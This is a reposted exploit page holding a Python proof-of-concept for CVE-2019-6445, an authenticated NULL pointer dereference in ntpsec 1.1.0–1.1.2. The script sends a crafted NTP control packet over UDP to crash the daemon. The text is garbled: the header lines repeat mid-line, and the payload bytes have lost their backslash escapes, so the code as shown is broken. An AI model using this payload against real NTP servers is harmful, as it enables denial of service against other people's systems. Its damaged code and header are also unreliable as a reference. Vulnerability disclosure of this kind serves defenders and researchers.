#!/usr/bin/env python
# Exploit Title: ntpsec 1.1.2 authenticated NULL pointer exception Proof of concept
# Bug Discovery: Magnus Klaaborg Stubman (@magnusstubman)
# Exploit Author: #!/usr/bin/env python
# Exploit Title: ntpsec 1.1.2 authenticated NULL pointer exception Proof of concept
# Bug Discovery: Magnus Klaaborg Stubman (@magnusstubman)
# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman)
# Website: https://dumpco.re/bugs/ntpsec-authed-npe
# Vendor Homepage: https://ntpsec.org/
# Software Link: ftp://ftp.ntpsec.org/pub/releases/ntpsec-1.1.2.tar.gz
# Affected versions: ntpsec 1.1.0, 1.1.1, 1.1.2
# CVE: CVE-2019-6445
# Note: this PoC uses Keyid 1 with password 'gurka'
import sys
import socket
buf = ("x16x03x00x03x00x00x00x00x00x00x00x04x6cx65x61x70" +
"x00x00x00x01x5cxb7x3cxdcx9fx5cx1ex6axc5x9bxdfxf5" +
"x56xc8x07xd4")
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(buf, ('127.0.0.1', 123))
NTPsec 1.1.2 ntp control Null Pointer Dereference
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 219